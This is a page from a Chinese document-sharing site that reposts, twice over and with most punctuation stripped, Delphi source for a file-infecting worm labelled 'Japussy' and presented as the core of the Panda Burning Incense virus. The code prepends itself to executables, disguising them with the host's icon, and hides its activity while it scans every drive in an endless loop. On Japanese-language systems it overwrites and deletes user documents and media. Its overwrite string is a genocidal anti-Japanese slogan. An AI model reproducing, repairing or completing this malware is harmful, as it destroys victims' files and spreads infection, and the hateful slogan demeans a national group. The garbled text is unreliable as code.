熊猫烧香病毒核心代码
program Japussy
uses
Windows SysUtils Classes Graphics ShellAPI{ Registry}
const
HeaderSize 82432 病毒体
IconOffset 12EB8 PE文件图标偏移量
Delphi5 SP1面编译版Delphi
查找2800000020十六进制字符串找图标偏移量
{
HeaderSize 38912 Upx压缩病毒体
IconOffset 92BC Upx压缩PE文件图标偏移量
Upx 124W 法 upx 9 8086 Japussyexe
}
IconSize 2E8 PE文件图标744字节
IconTail IconOffset + IconSize PE文件图标尾部
ID 44444444 感染标记
垃圾码备写入
Catchword 'If a race need to be killed out it must be Yamato ' +
'If a country need to be destroyed it must be Japan ' +
'*** W32JapussyWormA ***'
{R *RES}
function RegisterServiceProcess(dwProcessID dwType Integer) Integer
stdcall external 'Kernel32dll' 函数声明
var
TmpFile string
Si STARTUPINFO
Pi PROCESS_INFORMATION
IsJap Boolean False 日文操作系统标记
{ 判断否Win9x }
function IsWin9x Boolean
var
Ver TOSVersionInfo
begin
Result False
VerdwOSVersionInfoSize SizeOf(TOSVersionInfo)
if not GetVersionEx(Ver) then
Exit
if (VerdwPlatformID VER_PLATFORM_WIN32_WINDOWS) then Win9x
Result True
end
{ 流间复制 }
procedure CopyStream(Src TStream sStartPos Integer Dst TStream
dStartPos Integer Count Integer)
var
sCurPos dCurPos Integer
begin
sCurPos SrcPosition
dCurPos DstPosition
SrcSeek(sStartPos 0)
DstSeek(dStartPos 0)
DstCopyFrom(Src Count)
SrcSeek(sCurPos 0)
DstSeek(dCurPos 0)
end
{ 宿文件已感染PE文件中分离出备 }
procedure ExtractFile(FileName string)
var
sStream dStream TFileStream
begin
try
sStream TFileStreamCreate(ParamStr(0) fmOpenRead or fmShareDenyNone)
try
dStream TFileStreamCreate(FileName fmCreate)
try
sStreamSeek(HeaderSize 0) 跳头部病毒部分
dStreamCopyFrom(sStream sStreamSize HeaderSize)
finally
dStreamFree
end
finally
sStreamFree
end
except
end
end
{ 填充STARTUPINFO结构 }
procedure FillStartupInfo(var Si STARTUPINFO State Word)
begin
Sicb SizeOf(Si)
SilpReserved nil
SilpDesktop nil
SilpTitle nil
SidwFlags STARTF_USESHOWWINDOW
SiwShowWindow State
SicbReserved2 0
SilpReserved2 nil
end
{ 发带毒邮件 }
procedure SendMail
begin
位仁兄愿意完成?
end
{ 感染PE文件 }
procedure InfectOneFile(FileName string)
var
HdrStream SrcStream TFileStream
IcoStream DstStream TMemoryStream
iID LongInt
aIcon TIcon
Infected IsPE Boolean
i Integer
Buf array[01] of Char
begin
try 出错文件正退出
if CompareText(FileName 'JAPUSSYEXE') 0 then 感染
Exit
Infected False
IsPE False
SrcStream TFileStreamCreate(FileName fmOpenRead)
try
for i 0 to 108 do 检查PE文件头
begin
SrcStreamSeek(i soFromBeginning)
SrcStreamRead(Buf 2)
if (Buf[0] #80) and (Buf[1] #69) then PE标记
begin
IsPE True PE文件
Break
end
end
SrcStreamSeek(4 soFromEnd) 检查感染标记
SrcStreamRead(iID 4)
if (iID ID) or (SrcStreamSize < 10240) then 太文件感染
Infected True
finally
SrcStreamFree
end
if Infected or (not IsPE) then 果感染PE文件退出
Exit
IcoStream TMemoryStreamCreate
DstStream TMemoryStreamCreate
try
aIcon TIconCreate
try
感染文件图标(744字节)存入流
aIconReleaseHandle
aIconHandle ExtractIcon(HInstance PChar(FileName) 0)
aIconSaveToStream(IcoStream)
finally
aIconFree
end
SrcStream TFileStreamCreate(FileName fmOpenRead)
头文件
HdrStream TFileStreamCreate(ParamStr(0) fmOpenRead or fmShareDenyNone)
try
写入病毒体图标前数
CopyStream(HdrStream 0 DstStream 0 IconOffset)
写入目前程序图标
CopyStream(IcoStream 22 DstStream IconOffset IconSize)
写入病毒体图标病毒体尾部间数
CopyStream(HdrStream IconTail DstStream IconTail HeaderSize IconTail)
写入宿程序
CopyStream(SrcStream 0 DstStream HeaderSize SrcStreamSize)
写入已感染标记
DstStreamSeek(0 2)
iID 44444444
DstStreamWrite(iID 4)
finally
HdrStreamFree
end
finally
SrcStreamFree
IcoStreamFree
DstStreamSaveToFile(FileName) 换宿文件
DstStreamFree
end
except
end
end
{ 目标文件写入垃圾码删 }
procedure SmashFile(FileName string)
var
FileHandle Integer
i Size Mass Max Len Integer
begin
try
SetFileAttributes(PChar(FileName) 0) 掉读属性
FileHandle FileOpen(FileName fmOpenWrite) 开文件
try
Size GetFileSize(FileHandle nil) 文件
i 0
Randomize
Max Random(15) 写入垃圾码机次数
if Max < 5 then
Max 5
Mass Size div Max 间隔块
Len Length(Catchword)
while i < Max do
begin
FileSeek(FileHandle i * Mass 0) 定位
写入垃圾码文件彻底破坏掉
FileWrite(FileHandle Catchword Len)
Inc(i)
end
finally
FileClose(FileHandle) 关闭文件
end
DeleteFile(PChar(FileName)) 删
except
end
end
{ 获写驱动器列表 }
function GetDrives string
var
DiskType Word
D Char
Str string
i Integer
begin
for i 0 to 25 do 遍历26字母
begin
D Chr(i + 65)
Str D + ''
DiskType GetDriveType(PChar(Str))
磁盘网络盘
if (DiskType DRIVE_FIXED) or (DiskType DRIVE_REMOTE) then
Result Result + D
end
end
{ 遍历目录感染摧毁文件 }
procedure LoopFiles(Path Mask string)
var
i Count Integer
Fn Ext string
SubDir TStrings
SearchRec TSearchRec
Msg TMsg
function IsValidDir(SearchRec TSearchRec) Integer
begin
if (SearchRecAttr '') and
(SearchRecName <> '') then
Result 0 目录
else if (SearchRecAttr 16) and (SearchRecName <> '') and
(SearchRecName <> '') then
Result 1 根目录
else Result 2 根目录
end
begin
if (FindFirst(Path + Mask faAnyFile SearchRec) 0) then
begin
repeat
PeekMessage(Msg 0 0 0 PM_REMOVE) 调整消息队列避免引起怀疑
if IsValidDir(SearchRec) 0 then
begin
Fn Path + SearchRecName
Ext UpperCase(ExtractFileExt(Fn))
if (Ext 'EXE') or (Ext 'SCR') then
begin
InfectOneFile(Fn) 感染执行文件
end
else if (Ext 'HTM') or (Ext 'HTML') or (Ext 'ASP') then
begin
感染HTMLASP文件Base64编码病毒写入
感染浏览网页户
位兄弟愿意完成?
end
else if Ext 'WAB' then Outlook址簿文件
begin
获取Outlook邮件址
end
else if Ext 'ADC' then Foxmail址动完成文件
begin
获取Foxmail邮件址
end
else if Ext 'IND' then Foxmail址簿文件
begin
获取Foxmail邮件址
end
else
begin
if IsJap then 倭文操作系统
begin
if (Ext 'DOC') or (Ext 'XLS') or (Ext 'MDB') or
(Ext 'MP3') or (Ext 'RM') or (Ext 'RA') or
(Ext 'WMA') or (Ext 'ZIP') or (Ext 'RAR') or
(Ext 'MPEG') or (Ext 'ASF') or (Ext 'JPG') or
(Ext 'JPEG') or (Ext 'GIF') or (Ext 'SWF') or
(Ext 'PDF') or (Ext 'CHM') or (Ext 'AVI') then
SmashFile(Fn) 摧毁文件
end
end
end
感染删文件睡眠200毫秒避免CPU占率高引起怀疑
Sleep(200)
until (FindNext(SearchRec) <> 0)
end
FindClose(SearchRec)
SubDir TStringListCreate
if (FindFirst(Path + '**' faDirectory SearchRec) 0) then
begin
repeat
if IsValidDir(SearchRec) 1 then
SubDirAdd(SearchRecName)
until (FindNext(SearchRec) <> 0)
end
FindClose(SearchRec)
Count SubDirCount 1
for i 0 to Count do
LoopFiles(Path + SubDirStrings + '' Mask)
FreeAndNil(SubDir)
end
{ 遍历磁盘文件 }
procedure InfectFiles
var
DriverList string
i Len Integer
begin
if GetACP 932 then 日文操作系统
IsJap True 死吧
DriverList GetDrives 写磁盘列表
Len Length(DriverList)
while True do 死循环
begin
for i Len downto 1 do 遍历磁盘驱动器
LoopFiles(DriverList + '' '**') 感染
SendMail 发带毒邮件
Sleep(1000 * 60 * 5) 睡眠5分钟
end
end
{ 程序开始 }
begin
if IsWin9x then Win9x
RegisterServiceProcess(GetCurrentProcessID 1) 注册服务进程
else WinNT
begin
远程线程映射Explorer进程
位兄台愿意完成?
end
果原始病毒体
if CompareText(ExtractFileName(ParamStr(0)) 'Japussyexe') 0 then
InfectFiles 感染发邮件
else 已寄生宿程序开始工作
begin
TmpFile ParamStr(0) 创建时文件
Delete(TmpFile Length(TmpFile) 4 4)
TmpFile TmpFile + #32 + 'exe' 真正宿文件空格
ExtractFile(TmpFile) 分离
FillStartupInfo(Si SW_SHOWDEFAULT)
CreateProcess(PChar(TmpFile) PChar(TmpFile) nil nil True
0 nil '' Si Pi) 创建新进程运行
InfectFiles 感染发邮件
end
end
文香网httpwwwxiangdangnet
《香当网》用户分享的内容,不代表《香当网》观点或立场,请自行判断内容的真实性和可靠性!
该内容是文档的文本内容,更好的格式请下载文档
program Japussy
uses
Windows SysUtils Classes Graphics ShellAPI{ Registry}
const
HeaderSize 82432 病毒体
IconOffset 12EB8 PE文件图标偏移量
Delphi5 SP1面编译版Delphi
查找2800000020十六进制字符串找图标偏移量
{
HeaderSize 38912 Upx压缩病毒体
IconOffset 92BC Upx压缩PE文件图标偏移量
Upx 124W 法 upx 9 8086 Japussyexe
}
IconSize 2E8 PE文件图标744字节
IconTail IconOffset + IconSize PE文件图标尾部
ID 44444444 感染标记
垃圾码备写入
Catchword 'If a race need to be killed out it must be Yamato ' +
'If a country need to be destroyed it must be Japan ' +
'*** W32JapussyWormA ***'
{R *RES}
function RegisterServiceProcess(dwProcessID dwType Integer) Integer
stdcall external 'Kernel32dll' 函数声明
var
TmpFile string
Si STARTUPINFO
Pi PROCESS_INFORMATION
IsJap Boolean False 日文操作系统标记
{ 判断否Win9x }
function IsWin9x Boolean
var
Ver TOSVersionInfo
begin
Result False
VerdwOSVersionInfoSize SizeOf(TOSVersionInfo)
if not GetVersionEx(Ver) then
Exit
if (VerdwPlatformID VER_PLATFORM_WIN32_WINDOWS) then Win9x
Result True
end
{ 流间复制 }
procedure CopyStream(Src TStream sStartPos Integer Dst TStream
dStartPos Integer Count Integer)
var
sCurPos dCurPos Integer
begin
sCurPos SrcPosition
dCurPos DstPosition
SrcSeek(sStartPos 0)
DstSeek(dStartPos 0)
DstCopyFrom(Src Count)
SrcSeek(sCurPos 0)
DstSeek(dCurPos 0)
end
{ 宿文件已感染PE文件中分离出备 }
procedure ExtractFile(FileName string)
var
sStream dStream TFileStream
begin
try
sStream TFileStreamCreate(ParamStr(0) fmOpenRead or fmShareDenyNone)
try
dStream TFileStreamCreate(FileName fmCreate)
try
sStreamSeek(HeaderSize 0) 跳头部病毒部分
dStreamCopyFrom(sStream sStreamSize HeaderSize)
finally
dStreamFree
end
finally
sStreamFree
end
except
end
end
{ 填充STARTUPINFO结构 }
procedure FillStartupInfo(var Si STARTUPINFO State Word)
begin
Sicb SizeOf(Si)
SilpReserved nil
SilpDesktop nil
SilpTitle nil
SidwFlags STARTF_USESHOWWINDOW
SiwShowWindow State
SicbReserved2 0
SilpReserved2 nil
end
{ 发带毒邮件 }
procedure SendMail
begin
位仁兄愿意完成?
end
{ 感染PE文件 }
procedure InfectOneFile(FileName string)
var
HdrStream SrcStream TFileStream
IcoStream DstStream TMemoryStream
iID LongInt
aIcon TIcon
Infected IsPE Boolean
i Integer
Buf array[01] of Char
begin
try 出错文件正退出
if CompareText(FileName 'JAPUSSYEXE') 0 then 感染
Exit
Infected False
IsPE False
SrcStream TFileStreamCreate(FileName fmOpenRead)
try
for i 0 to 108 do 检查PE文件头
begin
SrcStreamSeek(i soFromBeginning)
SrcStreamRead(Buf 2)
if (Buf[0] #80) and (Buf[1] #69) then PE标记
begin
IsPE True PE文件
Break
end
end
SrcStreamSeek(4 soFromEnd) 检查感染标记
SrcStreamRead(iID 4)
if (iID ID) or (SrcStreamSize < 10240) then 太文件感染
Infected True
finally
SrcStreamFree
end
if Infected or (not IsPE) then 果感染PE文件退出
Exit
IcoStream TMemoryStreamCreate
DstStream TMemoryStreamCreate
try
aIcon TIconCreate
try
感染文件图标(744字节)存入流
aIconReleaseHandle
aIconHandle ExtractIcon(HInstance PChar(FileName) 0)
aIconSaveToStream(IcoStream)
finally
aIconFree
end
SrcStream TFileStreamCreate(FileName fmOpenRead)
头文件
HdrStream TFileStreamCreate(ParamStr(0) fmOpenRead or fmShareDenyNone)
try
写入病毒体图标前数
CopyStream(HdrStream 0 DstStream 0 IconOffset)
写入目前程序图标
CopyStream(IcoStream 22 DstStream IconOffset IconSize)
写入病毒体图标病毒体尾部间数
CopyStream(HdrStream IconTail DstStream IconTail HeaderSize IconTail)
写入宿程序
CopyStream(SrcStream 0 DstStream HeaderSize SrcStreamSize)
写入已感染标记
DstStreamSeek(0 2)
iID 44444444
DstStreamWrite(iID 4)
finally
HdrStreamFree
end
finally
SrcStreamFree
IcoStreamFree
DstStreamSaveToFile(FileName) 换宿文件
DstStreamFree
end
except
end
end
{ 目标文件写入垃圾码删 }
procedure SmashFile(FileName string)
var
FileHandle Integer
i Size Mass Max Len Integer
begin
try
SetFileAttributes(PChar(FileName) 0) 掉读属性
FileHandle FileOpen(FileName fmOpenWrite) 开文件
try
Size GetFileSize(FileHandle nil) 文件
i 0
Randomize
Max Random(15) 写入垃圾码机次数
if Max < 5 then
Max 5
Mass Size div Max 间隔块
Len Length(Catchword)
while i < Max do
begin
FileSeek(FileHandle i * Mass 0) 定位
写入垃圾码文件彻底破坏掉
FileWrite(FileHandle Catchword Len)
Inc(i)
end
finally
FileClose(FileHandle) 关闭文件
end
DeleteFile(PChar(FileName)) 删
except
end
end
{ 获写驱动器列表 }
function GetDrives string
var
DiskType Word
D Char
Str string
i Integer
begin
for i 0 to 25 do 遍历26字母
begin
D Chr(i + 65)
Str D + ''
DiskType GetDriveType(PChar(Str))
磁盘网络盘
if (DiskType DRIVE_FIXED) or (DiskType DRIVE_REMOTE) then
Result Result + D
end
end
{ 遍历目录感染摧毁文件 }
procedure LoopFiles(Path Mask string)
var
i Count Integer
Fn Ext string
SubDir TStrings
SearchRec TSearchRec
Msg TMsg
function IsValidDir(SearchRec TSearchRec) Integer
begin
if (SearchRecAttr '') and
(SearchRecName <> '') then
Result 0 目录
else if (SearchRecAttr 16) and (SearchRecName <> '') and
(SearchRecName <> '') then
Result 1 根目录
else Result 2 根目录
end
begin
if (FindFirst(Path + Mask faAnyFile SearchRec) 0) then
begin
repeat
PeekMessage(Msg 0 0 0 PM_REMOVE) 调整消息队列避免引起怀疑
if IsValidDir(SearchRec) 0 then
begin
Fn Path + SearchRecName
Ext UpperCase(ExtractFileExt(Fn))
if (Ext 'EXE') or (Ext 'SCR') then
begin
InfectOneFile(Fn) 感染执行文件
end
else if (Ext 'HTM') or (Ext 'HTML') or (Ext 'ASP') then
begin
感染HTMLASP文件Base64编码病毒写入
感染浏览网页户
位兄弟愿意完成?
end
else if Ext 'WAB' then Outlook址簿文件
begin
获取Outlook邮件址
end
else if Ext 'ADC' then Foxmail址动完成文件
begin
获取Foxmail邮件址
end
else if Ext 'IND' then Foxmail址簿文件
begin
获取Foxmail邮件址
end
else
begin
if IsJap then 倭文操作系统
begin
if (Ext 'DOC') or (Ext 'XLS') or (Ext 'MDB') or
(Ext 'MP3') or (Ext 'RM') or (Ext 'RA') or
(Ext 'WMA') or (Ext 'ZIP') or (Ext 'RAR') or
(Ext 'MPEG') or (Ext 'ASF') or (Ext 'JPG') or
(Ext 'JPEG') or (Ext 'GIF') or (Ext 'SWF') or
(Ext 'PDF') or (Ext 'CHM') or (Ext 'AVI') then
SmashFile(Fn) 摧毁文件
end
end
end
感染删文件睡眠200毫秒避免CPU占率高引起怀疑
Sleep(200)
until (FindNext(SearchRec) <> 0)
end
FindClose(SearchRec)
SubDir TStringListCreate
if (FindFirst(Path + '**' faDirectory SearchRec) 0) then
begin
repeat
if IsValidDir(SearchRec) 1 then
SubDirAdd(SearchRecName)
until (FindNext(SearchRec) <> 0)
end
FindClose(SearchRec)
Count SubDirCount 1
for i 0 to Count do
LoopFiles(Path + SubDirStrings + '' Mask)
FreeAndNil(SubDir)
end
{ 遍历磁盘文件 }
procedure InfectFiles
var
DriverList string
i Len Integer
begin
if GetACP 932 then 日文操作系统
IsJap True 死吧
DriverList GetDrives 写磁盘列表
Len Length(DriverList)
while True do 死循环
begin
for i Len downto 1 do 遍历磁盘驱动器
LoopFiles(DriverList + '' '**') 感染
SendMail 发带毒邮件
Sleep(1000 * 60 * 5) 睡眠5分钟
end
end
{ 程序开始 }
begin
if IsWin9x then Win9x
RegisterServiceProcess(GetCurrentProcessID 1) 注册服务进程
else WinNT
begin
远程线程映射Explorer进程
位兄台愿意完成?
end
果原始病毒体
if CompareText(ExtractFileName(ParamStr(0)) 'Japussyexe') 0 then
InfectFiles 感染发邮件
else 已寄生宿程序开始工作
begin
TmpFile ParamStr(0) 创建时文件
Delete(TmpFile Length(TmpFile) 4 4)
TmpFile TmpFile + #32 + 'exe' 真正宿文件空格
ExtractFile(TmpFile) 分离
FillStartupInfo(Si SW_SHOWDEFAULT)
CreateProcess(PChar(TmpFile) PChar(TmpFile) nil nil True
0 nil '' Si Pi) 创建新进程运行
InfectFiles 感染发邮件
end
end
文香网httpwwwxiangdangnet
《香当网》用户分享的内容,不代表《香当网》观点或立场,请自行判断内容的真实性和可靠性!
该内容是文档的文本内容,更好的格式请下载文档
